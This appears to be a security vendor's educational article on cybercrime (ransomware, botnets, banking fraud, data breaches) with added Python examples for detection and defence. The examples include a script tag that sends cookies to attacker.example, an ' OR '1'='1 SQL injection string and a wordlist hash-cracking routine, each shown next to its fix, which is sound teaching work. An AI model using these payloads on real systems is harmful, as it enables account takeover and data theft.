TitanHQ

Exposing How Cybercriminals Operate.

How Cybercriminals Steal Money!

Hackers have moved beyond stealing corporate and government secrets and defacing web pages to something more lucrative: stealing actual cash and credit card numbers, committing fraud, extorting people, and even encrypting data files and holding them for ransom until the victim pays a fee to get them back. Over the past three or four years the profile of the cyber attacker has changed. Previously the people who wrote worms and viruses typically wanted to make names for themselves; they were seekers of notoriety. They would release worms and viruses that generated lots of traffic and crashed lots of servers until a patch was deployed, and then the game was over. The big shift of the past three years is a result of the significantly increasing volume of commerce now transacted on the Internet. As more businesses make more and more money from ecommerce, cybercriminals want their share. The motivation behind the vast majority of cyber attacks today is money. The attacker profile has shifted from amateurs to professionals who want to make money and, in many cases, are very well organized. It is their full-time job to attack sites. In some cases they hire other people as "mules" to move money from one place to another, so it is an extensive, organized network. We are not fighting amateurs anymore. Let's explore some of what cybercriminals are doing and what, if anything, you can do to protect against it.

Organized Crime Networks

An example of an organized crime network is the Russian Business Network. They are responsible for botnets like Storm, which compromised over one million machines. Storm is a peer-to-peer botnet that can be used for denial of service, keylogging and several other malicious actions. The Russian Business Network is also alleged to be responsible for a piece of software called Malware Alarm. Malware Alarm pops up a dialog box on your PC with a message saying, "We think your computer is infected by malware. Please click here to disinfect." Of course, if you click to disinfect, it infects your computer rather than disinfecting it. The Russian Business Network is a very organized group. The operators rent out the machines in those botnets at a price per machine per day: a customer hands over a binary, and the operators push that binary onto the compromised machines and run it on the customer's behalf.

Encrypted File Ransom Attacks

A new tactic used by thieves is to encrypt the files on a victim's computer and demand a ransom to unlock them. One tool for doing that is the Cryptolocker malware. In November, the National Crime Agency in the UK warned that tens of millions of people had been targeted by spam carrying the Cryptolocker virus.
 
If you fall victim to Cryptolocker, a hacker could lock up forever the spreadsheet or document where you keep all your contacts, personal data, and root passwords. While this data might have little or no value to the hacker, for you it is vital. So you would certainly consider paying 1 bitcoin (454 euros at the time), as in the ransom screen shown below, to get it back.

The Cryptolocker email contains a zip file. Inside is a file with a PDF icon whose actual suffix is .exe (for example invoice.pdf.exe). People do not see that it is an .exe because "show file extensions" is turned off in Windows by default. So the victim unzips the file, clicks on the "PDF", and installs the virus. Cryptolocker then starts encrypting files, and it also goes out to the internet and downloads even more malware. The victim cannot unlock the files by looking for the encryption key in the Windows registry or file system; Cryptolocker is more sophisticated than that. It obtains its encryption key from its command and control server, and the key needed to decrypt the files never leaves the attackers' infrastructure. It is also fault tolerant. There is not just a handful of command and control servers that could be blocked by coordinated law enforcement. Instead the thieves have adopted a peer-to-peer approach, relying on the Gameover Zeus botnet explained below, which makes the infrastructure difficult to shut down.
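As an added illustration (not code from the original article), the following Python script shows the two checks a mail gateway or a cautious user can run on such an attachment: whether a name inside the zip hides an executable extension behind a decoy one, and whether the file content starts with the Windows executable signature "MZ" regardless of what the name claims. The zip archive and its contents are constructed inside the script, and the extension lists are a starting point, not an exhaustive catalogue.

```python
import io
import zipfile

# Extensions Windows will execute when double-clicked (illustrative, not exhaustive).
EXECUTABLE_SUFFIXES = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# Harmless-looking extensions attackers place in front of the real one.
DECOY_SUFFIXES = {".pdf", ".doc", ".docx", ".xls", ".jpg", ".txt"}


def classify_entry(name: str, data: bytes) -> list:
    """Return the reasons an archive entry looks like a disguised executable (empty if none)."""
    reasons = []
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = "." + parts[-1] if len(parts) >= 2 else ""
    if ext in EXECUTABLE_SUFFIXES:
        reasons.append("executable extension " + ext)
        if len(parts) >= 3 and "." + parts[-2] in DECOY_SUFFIXES:
            reasons.append("decoy extension ." + parts[-2] + " hides " + ext)
    # Windows PE files begin with the DOS header magic "MZ" whatever they are called.
    if data[:2] == b"MZ" and ext not in EXECUTABLE_SUFFIXES:
        reasons.append("content starts with the PE 'MZ' signature but the name ends in "
                       + (ext or "no extension"))
    return reasons


def suspicious_entries(zip_bytes: bytes) -> dict:
    """Map entry name -> reasons, for every entry in the archive that looks disguised."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(64)  # the magic check only needs the first bytes
            reasons = classify_entry(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample attachment: a PE with a decoy extension, a real PDF, and a PE named .pdf."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2014.pdf.exe", b"MZ\x90\x00" + b"\x00" * 60)  # the Cryptolocker pattern
        zf.writestr("Report.pdf", b"%PDF-1.4\n% minimal constructed body\n")  # genuine PDF header
        zf.writestr("Notes.pdf", b"MZ\x90\x00" + b"\x00" * 60)  # PE bytes behind a .pdf name
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in suspicious_entries(build_sample_zip()).items():
        print(entry, "->", "; ".join(why))
```

Checking the file header as well as the name matters because a renamed executable is still executable once the user (or another program) renames it back, and because some mail clients and archive tools display only the part of the name before the last dot.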


Gameover Zeus

The Gameover Zeus botnet is a network of 500,000 to 1 million Windows computers infected with the Gameover virus, which is used to process payments and deliver encryption keys for Cryptolocker. Krebs on Security reported in June 2014 that the US Justice Department worked with law enforcement agencies around the world to take control of the Gameover Zeus botnet. Krebs says that Gameover has been used to steal more than $100 million from banks, businesses, and consumers. The accomplices in this crime are ordinary people who unwittingly allowed their computers to be compromised, turning them into proxies for the criminals.

An ordinary hacker can rent a botnet to launch, say, a denial of service attack. Gameover Zeus is orders of magnitude more complex. If its command and control servers are taken down, the bots fall back to a domain generation algorithm: each day they compute a fresh list of pseudo-random domain names ending in .ru, .com, .info, and .biz, try to resolve each one in DNS, and connect to whichever ones the criminals have actually registered. In other words, if law enforcement shuts down the existing command and control servers, the thieves only need to register a few of that day's names to bring their traffic back online, because every bot is already looking for them.
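As an added example (not the original article's code, and not the real Gameover Zeus algorithm, whose details this page does not cover), here is a toy date-seeded domain generation algorithm in Python together with the defender's side of it: because the algorithm is deterministic, anyone who has reverse engineered the seed and the function can precompute the day's candidate list and match it against DNS logs to find infected hosts. The seed, the log format and the log lines are all constructed for the example.

```python
import hashlib
from datetime import date

TLDS = [".ru", ".com", ".info", ".biz"]
SAMPLE_DAY = date(2014, 6, 2)  # constructed date used by the sample log


def generate_domains(day: date, count: int = 20, seed: str = "example-seed") -> list:
    """Toy DGA: derive `count` deterministic pseudo-random domains from the date and a seed.
    Bot and botmaster run the same function, so they agree on the day's names without contact."""
    domains = []
    for i in range(count):
        material = f"{seed}:{day.isoformat()}:{i}".encode()
        digest = hashlib.sha256(material).digest()
        length = 8 + digest[0] % 8  # 8 to 15 letters
        label = "".join(chr(ord("a") + b % 26) for b in digest[1:1 + length])
        domains.append(label + TLDS[digest[31] % len(TLDS)])
    return domains


def find_dga_lookups(log_lines: list, day: date, count: int = 20, seed: str = "example-seed") -> list:
    """Defender side: return (client_ip, domain) for log lines that looked up one of the day's DGA names.
    Assumed log format (constructed for this example): '<timestamp> <client_ip> query <domain>'."""
    candidates = set(generate_domains(day, count, seed))
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4 or fields[2] != "query":
            continue
        domain = fields[3].rstrip(".").lower()
        if domain in candidates:
            hits.append((fields[1], domain))
    return hits


def sample_log(day: date = SAMPLE_DAY) -> list:
    """Constructed DNS log: two normal lookups and two DGA lookups from one infected host."""
    todays = generate_domains(day)
    return [
        "2014-06-02T08:00:01 10.0.0.5 query www.example.com",
        f"2014-06-02T08:00:02 10.0.0.9 query {todays[0]}",
        "2014-06-02T08:00:03 10.0.0.5 query mail.example.com",
        f"2014-06-02T08:00:04 10.0.0.9 query {todays[7]}",
    ]


if __name__ == "__main__":
    print("today's candidates:", generate_domains(SAMPLE_DAY)[:5], "...")
    print("infected hosts:", find_dga_lookups(sample_log(), SAMPLE_DAY))
```

The same precomputation is what lets law enforcement and registrars "sinkhole" a DGA botnet: register or block the day's names before the criminals do, so the bots connect to a server the defenders control.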


Online Banking Heists

The internet has greatly reduced the number of people a bank robber needs in a crew. The old way of robbing someone's bank account was to replace an ATM's card reader with a skimmer, install a camera to capture the PIN as the customer typed it in, and then clone the debit card. A victim of account theft like that has varying levels of protection depending on where they live, whether they have insurance, what kind of account they have, and how much money was stolen. But consumer protection does not always extend to businesses, where a single wire transfer can reach into the hundreds of thousands or millions of dollars. ComputerWorld reported that a judge ruled a bank in the USA could not be held responsible for $440,000 stolen from a business account. The bank had followed recommended security practices; the customer had lost their user id and password to hackers, who used them to wire money to themselves. The court said the customer's failure to protect their own password was not the bank's fault.

Sometimes banks are the victims themselves. Last year hackers logged into the systems of various banks in the Middle East and greatly increased the value of prepaid MasterCards issued there. Then thieves fanned out on foot to buy luxury cars and Rolex watches.
 

Keyboard Logging

The thieves who robbed the commercial customer mentioned above could have stolen those credentials by installing malware that records keystrokes. Windows is not the only place where that happens. Security researchers have shown that Android (and iPhone) apps can use the accelerometer, gyroscope, and orientation sensors to infer what the user has typed on the on-screen keyboard.

People rarely pay any attention to the permissions requested by Android apps when they install them. Plus, apps ask for permissions they do not need. For example, why does Chrome need access to your camera, and why does Microsoft SkyDrive need access to your contacts? What makes this situation worse is that, in the Android versions current at the time of writing, there is no option to grant permissions one at a time: either you install the app with all the permissions it requests or you do not install it. (Android 6.0 later introduced runtime permissions that can be granted individually.) So people are trained to give all of that away without a second thought.

Fraud

There are many kinds of smartphone attacks. For example, people install malware that looks like something they already know, such as Angry Birds, and uses the same logo. The user blows through the permissions screen without reading it carefully and gives away access to their phone logs, contacts, camera and microphone, sensors, and the ability to send text messages. Once installed, the app can send text messages to premium-rate messaging services, running up the customer's bill and filling the criminal's coffers.

WhatsApp has also become a platform for fraud. People are tricked into forwarding messages to others. When someone clicks the link in such a message, it takes them to a website, which records their IP address. With the IP address, the hacker can consult a phonebook and a map to craft a voicemail from that country code and area code, or an invoice from a company located in that area. Someone is more likely to trust something from a person who works or lives in the same area than from some distant location. Once the victim opens the link, the site can drop an .apk file (a packaged Android app) into the download folder. Depending on the operating system version and the security settings on the phone, if the user taps on it the phone either installs the app, warns the user first, or refuses to install anything. Then the app can start stealing data and sending out copies of itself.

Wholesale Data Theft

It was widely reported last year that hackers got into the point-of-sale cash register systems at the American retailer Target and stole the data of around 40 million payment cards. This type of data, card numbers and identity information, is very attractive to cybercriminals. Within hours those stolen cards were being sold in online black markets for up to $100 each. Online black markets are an ever-expanding channel in a growing underground economy. Criminals can also write the stolen card data onto the magnetic stripes of blank cards of their own and hand those out to mules, who then go to ATMs and try to take cash advances or use the cards at various points of sale. The American banking system was particularly vulnerable to this because its cards relied on the magnetic stripe alone rather than on EMV chip-and-PIN. Because of this weakness and the resulting data losses, the Americans are starting to change their payment systems.

This year there were more victims. Hackers stole the login details of around 145 million eBay users. eBay owns PayPal as well, but the passwords for each system are kept in separate databases. Thank goodness for that, as PayPal is where the money is. But as you know, people often use the same password for more than one system. Try someone's eBay password at PayPal and it might just work.

Stolen password databases are not safe just because the passwords are not stored in the clear. Well-run sites do not store passwords encrypted (that would require a key, which the site itself could lose) but hashed, with a one-way function. Hashing is only as strong as the passwords behind it: an attacker takes a dictionary of common words and previously leaked passwords, hashes each candidate, and compares the results with the stolen hashes. Any password that is a dictionary word, or that was hashed without a per-user salt using a fast algorithm such as MD5 or SHA-1, falls in seconds. For this reason, people should not use words in English, Russian, or any other language as passwords. You have undoubtedly heard this before, but are you doing it? All network devices should be configured with strong passwords. Passwords should be at least 8 characters (longer is better), not made of dictionary words, mixed case, include numbers and symbols, and be unique to each system.
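As an added example (not from the original article), the Python script below shows both sides of this: how an attacker recovers dictionary passwords from a leaked dump of unsalted SHA-1 hashes by hashing a wordlist once, and why a random per-user salt with a deliberately slow derivation function (PBKDF2 from Python's standard library here) makes that precomputed lookup useless. The "breach" data and the wordlist are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist: what a cracker starts from (dictionary words plus leaked favourites).
WORDLIST = ["password", "letmein", "qwerty", "dragon", "sunshine", "monkey"]


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode()).hexdigest()


def crack_unsalted(leaked: dict, wordlist: list) -> dict:
    """Attacker side: hash every candidate once, then look each leaked hash up in the table.
    With no salt, one pass over the wordlist cracks every user who chose a listed word."""
    lookup = {sha1_hex(word): word for word in wordlist}
    return {user: lookup[h] for user, h in leaked.items() if h in lookup}


# Defender side: per-user random salt and a slow key-derivation function.
PBKDF2_ROUNDS = 100_000  # raise as hardware gets faster


def store_password(password: str, salt: bytes = None) -> tuple:
    """Return (salt, derived_key); a fresh random salt is drawn for every user."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, dk


def verify_password(password: str, salt: bytes, dk: bytes) -> bool:
    """Re-derive with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, dk)


def build_leaked_dump() -> dict:
    """Constructed 'breach': unsalted SHA-1 hashes, as a careless site might store them."""
    return {
        "alice": sha1_hex("sunshine"),
        "bob": sha1_hex("dragon"),
        "carol": sha1_hex("V9!kq#2mLp7z"),  # not in the wordlist: survives this attack
    }


def salted_hashes_differ(password: str) -> bool:
    """Two users with the same password get different stored values, so a cracked
    hash cannot be reused against the other user, and no precomputed table applies."""
    salt1, dk1 = store_password(password)
    salt2, dk2 = store_password(password)
    return dk1 != dk2 and verify_password(password, salt1, dk1) and verify_password(password, salt2, dk2)


if __name__ == "__main__":
    print("cracked:", crack_unsalted(build_leaked_dump(), WORDLIST))
    print("same password, different stored hashes:", salted_hashes_differ("sunshine"))
```

The salt does not make a weak password strong; "sunshine" would still fall to a targeted guess. What it removes is the economy of scale: the attacker must run the slow function separately for every user and every guess instead of once per word for the whole dump.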

Security Weaknesses in Windows

The security weaknesses of the x86 PC architecture and Windows are almost too numerous to list. Here are just a few, and what, if anything, has been done to address them.

One process should not be able to read or write the memory of another process. The processor's memory management unit and the operating system enforce that isolation together, so every gap in it is a bug in one of them.

  • 64-bit Windows requires kernel-mode drivers to be signed before they will load. That is an improvement, as it pushes malware authors towards user-mode code that hides inside other running processes instead of loading its own driver. Of course, installing an .exe is another matter, as the user who runs it has given the operating system express permission.
  • The buffer overflow problem arises in languages like C and C++ that do not check whether a write stays within the bounds of the buffer it was meant for. Java and Android do not have this problem, as programs there run inside a virtual machine (the modified version of Java that powers Android is called Dalvik) that bounds-checks every array access. A C++ program on Windows can write past the end of its own buffer and overwrite whatever sits next to it, including the return address of the current function. Attackers use this to redirect execution to machine code they have planted, which is how they gain a command shell on the machine. Microsoft now randomizes where items are stored in memory (ASLR) and marks data pages non-executable (DEP) to make that more difficult.
  • Historically, most Windows users ran with administrator rights. So any program a person launched could modify routing tables, overwrite system files, and do things that are limited to the root account on Mac OS and other Unix-like systems. User Account Control and standard (non-administrator) accounts reduce this, provided they are actually used.

With the level of threats growing, what can you do? The short answer is: it's complicated. The best security is to assume that your computers are already infected.

Two Factor Authentication

The number one way to stop hackers is to require two-factor authentication everywhere. The idea is so simple that it is baffling why people do not use their cell phone or another device to authenticate to their email or PC. If a hacker plants malware on your computer to read your keystrokes, the stolen password alone is not enough to log in: they would also need the one-time code from the Google Authenticator app, the RSA token, the Cryptocard, or the biometric device that supplies the second factor.

These solutions do not solve the problem of phishing, spoofing or online impersonation (a one-time code typed into a fake site can be relayed to the real one within its validity window; only hardware keys that bind the login to the genuine site close that hole), but they all make it a lot more difficult for criminals to succeed. Getting people to use two-factor authentication is a matter of education on the importance of doing so. The technology is available: most banks and brokerages, and the social media sites, offer it.

 
Internet and Computer Usage Policy

The biggest wild card in computer security is the end user. A good corporate usage policy is an obvious starting point, yet many companies do not bother or do not realise its importance. A usage policy is now a serious requirement for businesses. Importantly, not all internet policies should be the same: each should be tailored to the organisation's particular requirements so that clear, realistic and company-appropriate guidelines are in place. As well as the issue of time wasted on the internet, the risk of employees accessing infected sites or spreading malware, viruses and botnet infections across the network is widespread. Cybercriminals wanting access to a company's network and data are not interested in the size of the company, so organisations of all sizes are at risk; being prepared is the best defence.

Training and Education

Probably the best way to prevent attacks is through education. As we said earlier, botnets are made up of computers belonging to ordinary people, set loose on your computers and others. People already know not to play with matches; they should also be taught to pay attention to what they click.

Don’t be a Vector

If you are running a website or application, deploy controls against cross-site scripting and SQL injection. Those are attacks where someone enters fragments of code (script or SQL) into data fields, and because the application pastes the input straight into an HTML page or a database query, the browser or the database executes it as instructions, exposing other users' session cookies, copying data, or otherwise doing damage. The fix in both cases is to keep data separate from code: parameterized queries for SQL, and output encoding appropriate to the context for HTML.
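As an added example (not code from the original article), the Python script below puts a vulnerable login query next to its parameterized form, and a vulnerable comment renderer next to one that escapes HTML, so the two attacks named above and their fixes can be seen side by side. The in-memory SQLite table, the user records and the payloads are constructed for the example; the password column is left in plain text only to keep the injection point small.

```python
import html
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory user table for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse'), ('bob', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn, name: str, password: str) -> bool:
    """Input is pasted into the SQL text, so quotes in the input rewrite the query itself."""
    query = f"SELECT COUNT(*) FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, name: str, password: str) -> bool:
    """Placeholders send the values separately from the SQL, so the database never parses them as code."""
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone()[0] > 0


# Cross-site scripting: the same mistake, with HTML instead of SQL.
def render_comment_vulnerable(comment: str) -> str:
    return '<li class="comment">' + comment + "</li>"


def render_comment_safe(comment: str) -> str:
    """html.escape turns <, >, &, and quotes into entities so the browser shows them as text."""
    return '<li class="comment">' + html.escape(comment, quote=True) + "</li>"


# Constructed payloads.
SQLI_PAYLOAD = "' OR '1'='1"  # closes the quoted value and appends an always-true condition
XSS_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable login, unknown user + injected password:", login_vulnerable(db, "nobody", SQLI_PAYLOAD))
    print("safe login, same input:", login_safe(db, "nobody", SQLI_PAYLOAD))
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
```

With the payload in place the vulnerable query becomes `... WHERE name = 'nobody' AND password = '' OR '1'='1'`, which is true for every row, so the attacker is "logged in" without knowing any password; the parameterized version simply looks for a user whose password is literally the payload string and finds none.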

Security Solutions

Spam is a big headache for organisations, causing problems such as data loss, network slowdown, lost employee time, and the delivery of offensive, fraudulent and dangerous content to users. Spammers are constantly deploying new techniques to get around spam and security filters. Selecting a business spam filter can take spam off the list of problems, and there is a wide range of business spam filtering solutions available. Choosing the right one for your organisation will depend on many factors, including the number of email accounts you want to support, your network topology, how much you are willing to spend, how you would like to deploy the solution, and how easily you could migrate to an alternative later. Once you have established your key requirements, it is time to research the options available.

It is important to keep your anti-spam, anti-virus and other network security solutions up to date. Most solutions will prompt you to do this and many will update automatically, but it is still important to check for updates manually on a regular basis. Often the updates will be about new features you do not care about, but they also frequently deliver critical security patches behind the scenes.

Conclusion

After outlining the risks and how to mitigate some of them, it is important to note that the situation is only going to get worse as refrigerators, thermostats, televisions, and even automobiles are all now connected, or will soon be connected, to the internet. Expect cybercrime to increase, and educate yourself about it. Even some of the most secure computers in the world, those of the US military and the NSA, were defeated by simple thumb drives. So you and your organization are certainly going to be a target at some point. The important thing is to plan for that.

If you enjoyed this article you might also be interested in our System Administrators toolbox, which contains lots of useful resources for busy IT pros.


 
